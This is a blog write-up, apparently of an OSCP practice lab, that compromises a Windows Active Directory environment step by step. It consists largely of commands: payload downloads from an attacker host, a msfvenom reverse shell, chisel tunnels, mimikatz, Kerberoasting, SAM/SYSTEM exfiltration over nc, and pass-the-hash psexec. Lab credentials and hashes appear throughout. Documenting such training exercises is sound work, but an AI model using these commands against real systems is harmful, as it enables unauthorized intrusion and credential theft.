Challenge 6 - AD

 Challenge 6 - AD

先掃對外的機器 └─$ rustscan -a 192.168.187.153 --scripts none --ulimit 5000 | tee rustscan




列舉服務資訊 └─$ sudo nmap -sCV -p 22,135,139,445,5040,5985,8000,47001,49664,49666,49665,49667,49669,49670,49668,49671 192.168.187.153 | tee nmap

跑 SSH 22 的 Windows,以及 8000 IIS




└─$ whatweb 192.168.187.153:8000,標準 IIS 10.0 服務



預設 8000 Port 沒啥東西





└─$ sudo nmap -sU -p 161 192.168.187.153,snmp 服務沒開                                                               



└─$ gobuster -w dirfuzzing.txt dir -u http://192.168.187.153:8000 -t 150 -x txt,pdf,git,aspx | tee gobuster,HTTP Status 200 有這兩個

/aspent_client

/partner




http://192.168.187.153:8000/partner/ 顯示 Access Deny,看來是個資料夾,那就掃子目錄看看

└─$ gobuster -w dirfuzzing.txt dir -u http://192.168.187.153:8000/partner -t 150 -x txt,pdf,git,aspx | tee gobuster-partner,掃出兩個路徑 /changelog、/db




連線測試發現是檔案,下載回 kali 看看,changelog 檔案沒啥東西

db 檔案無法讓人友善的讀,改成 strings db 發現是一個 SQLite format 3 格式檔案




將檔案丟到線上 SQLite Viewer https://inloop.github.io/sqlite-viewer/ 查看如下

發現帳號與密碼的紀錄欄位

ecorp:7007296521223107d3445ea0db5a04f9

support:26231162520c611ccabfb18b5ae4dff2 (support account for internal use)

bcorp:e7966b31d1cad8a83f12ecec236c384c

acorp:df5fb539ff32f7fde5f3c05d8c8c1a6e



線上 HASH 破解試試看 https://hashes.com/en/decrypt/hash,解出三個 HASH

ecorp:ecorp

support:Freedom1

bcorp:bcorp123!

acorp:df5fb539ff32f7fde5f3c05d8c8c1a6e --> 解不出來

把解不出來的丟到這裡先分析一下看看是哪一種 HASH https://www.tunnelsup.com/hash-analyzer/




看來應該是 MD5,那就 hashcat 解解看 └─$ hashcat -m 0 df5fb539ff32f7fde5f3c05d8c8c1a6e /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

沒有解出來,那就先略過它


使用現有拿到的帳號密碼寫到檔案測試其他服務看看

└─$ hydra -L ./usernames.txt -P ./passwords.txt ssh://192.168.187.153

support:Freedom1 --> SSH Success



SSH 進去後是 command line 使用者是 support,dir 後發現一個怪怪的軟體 admintool.exe




直接執行要你輸入 --help,輸入 --help 後可以看到要你接 <CMD>

輸入 admintool.exe powershell 要輸入密碼,輸入 Freedom1 噴錯誤如下,看來又是個 HASH

left: `"26231162520c611ccabfb18b5ae4dff2"`,                                                 

right: `"05f8ba9f047f799adbea95a16de2ef5d"`: Wrong administrator password!', src/main.rs:78:5

note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace



一樣到這裡解解看 https://hashes.com/en/decrypt/hash

left: "26231162520c611ccabfb18b5ae4dff2" --> 這個就是剛剛 Support 密碼的 HASH                                                 

right: "05f8ba9f047f799adbea95a16de2ef5d" --> December31,看來是 administrator 的密碼




SSH administrator@192.168.187.153 輸入 December31 順利進去,whoami 發現是管理者




順利拿下 153 的管理者,開始標準作業上傳 payload

iwr -uri http://192.168.45.173/nc64.exe -Outfile nc.exe

iwr -uri http://192.168.45.173/chisel.exe -Outfile chisel.exe

iwr -uri http://192.168.45.173/mimikatz.exe -Outfile mimikatz.exe

標準作業 mimikatz.exe,privilege::debug,sekurlsa::logonpasswords

一樣只有發現 Administrator : 3c4495bbd678fac8c9d218be4f2bbc7b

└─$ hashcat -m 1000 3c4495bbd678fac8c9d218be4f2bbc7b /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

解出來一樣是 December31,先將 HASH 記錄下來即可




搭建 chisel,└─$ chisel server --port 8080 --reverse                    

wmic process call create "C:\users\administrator\chisel.exe client 192.168.45.173:8080 R:socks"

搭建完後測試一下內網伺服器用 administrator HASH 試試看,└─$ proxychains4 -q evil-winrm -i 10.10.77.154 -u administrator -H 3c4495bbd678fac8c9d218be4f2bbc7b,結果無法登入




153 搭建另一個 session 時,無論使用 nc64.exe 或是 powercat.ps1 都無法成功,後來直接包 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.173 LPORT=443 -f exe -b '\x00\x0d\x0a' -o 153-2.exe

上傳 payload 後執行就可以建立 reverse shell 回來了



透過指令 (Get-PSReadlineOption).HistorySavePath 確認 Log 存放路徑

獲得檔案後直接 type 看一下,得到 C:\users\support\admintool.exe hghgib6vHT3bVWf cmd

看來是一組密碼,一樣先存到 passwords.txt 然後測試看看




crackmapexec 預設會用網域方式登入測試,經一輪測試後沒有發現新的登入

後來加上 --local-auth 表示帳號用作本機的帳號測試,指令 └─$ proxychains4 -q crackmapexec smb 10.10.95.154 -u ./usernames.txt -p 'hghgib6vHT3bVWf' --local-auth

發現 administrator:hghgib6vHT3bVWf 為 154 本機帳號




那就直接登入吧 └─$ proxychains4 -q evil-winrm -i 10.10.95.154 -u administrator -p hghgib6vHT3bVWf,登入就是管理者




標準作業 iwr -uri http://192.168.45.194/mimikatz.exe -Outfile mimikatz.exe

發現顯示 Unable to connect to the remote server,那就搭反向 chisel 吧

153 : chisel.exe server --port 1234 --reverse -v

kali : chisel client 192.168.205.153:1234 R:4321:127.0.0.1:80

iwr -uri http://10.10.95.153:4321/mimikatz.exe -Outfile mimikatz.exe,上傳 mimikatz.exe





標準作業 mimikatz.exe,privilege::debug,sekurlsa::logonpasswords

執行後發現錯誤,一直跳 mimikatz#,先想想等等再繼續

另外在 153 進行 winPEASx64.exe 實有發現另外一組帳號密碼

OSCP\web_svc:Diamond1,直接用該帳號對 DC 做 Kerberos Roasting
└─$ proxychains4 -q impacket-GetUserSPNs -request -dc-ip 10.10.95.152 oscp.exam/web_svc
獲得兩組 kerbers TSG-REP 的帳號 sql_svc、web_svc





將 hash 存成檔案直接破解看看吧
└─$ hashcat -m 13100 hashes.krb5tgs /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
web_svc 是透過 153 上的 winPEASx64.exe 獲得的,破出來一樣是 Diamond1



另一個 sql_svc 沒有破出來所以又回到源頭,後來在 154 上看到 windows.old

那就做一點較麻煩的功吧,先將 SAM & SYSTEM COPY 到 Administrator 路徑下

copy C:\windows.old\Windows\System32\SAM C:\users\Administrator\SAM

copy C:\windows.old\Windows\System32\SYSTEM C:\users\Administrator\SYSTEM





再將 SAM & SYSTEM 抓回 kali 上破解

153 : chisel.exe server --port 2345 --reverse -v

kali : chisel client 192.168.205.153:2345 R:5432:127.0.0.1:7777

C:\users\Administrator\nc.exe 10.10.95.153 5432 < SAM

跑起來有一點問題無法順利執行 nc.exe 來傳送檔案

後來看到 crackmapexec 可以用參數 --lsa 就能直接對遠端機器做 lsa dump,拿來對 154 試試看

└─$ proxychains4 -q  crackmapexec smb 10.10.95.154 -u Administrator -p hghgib6vHT3bVWf --local-auth --lsa

獲得 OSCP.EXAM/Administrator:$DCC2$10240#Administrator#a3a38f45ff2adaf28e945577e9e2b57a




另外要將 SAM & SYSTEM 使用 └─$ proxychains4 -q evil-winrm -i 10.10.129.154 -u administrator -p hghgib6vHT3bVWf 跑 NC 傳檔案一直不成功無法成功 run NC

後來改用 impacket-psexec 進去 └─$ proxychains4 -q impacket-psexec administrator:hghgib6vHT3bVWf@10.10.129.154 跑 nc 傳輸檔案

153 : C:\Users\Administrator>chisel.exe server --port 2345 --reverse -v
Kali : └─$ chisel client 192.168.239.153:2345 R:5432:127.0.0.1:443
└─$ rlwrap -cAr nc -nvlp 443 > SAM
154 : C:\users\Administrator\nc.exe 10.10.129.153 5432 < SAM

斷開再跑一次
impacket-psexec 進去 └─$ proxychains4 -q impacket-psexec administrator:hghgib6vHT3bVWf@10.10.129.154
kali : └─$ rlwrap -cAr nc -nvlp 443 > SYSTEM
154 : C:\users\Administrator\nc.exe 10.10.129.153 5432 < SYSTEM

SYSTEM 較大傳得有點久要耐心等一下

傳完後直接 dump

└─$ impacket-secretsdump -sam ./SAM -system ./SYSTEM LOCAL

tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::



接著一樣使用 impacket-psexec 用 tom_admin 試試看

proxychains -q impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc tom_admin@10.10.129.152

進去 DC 了,直接拿答案吧




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)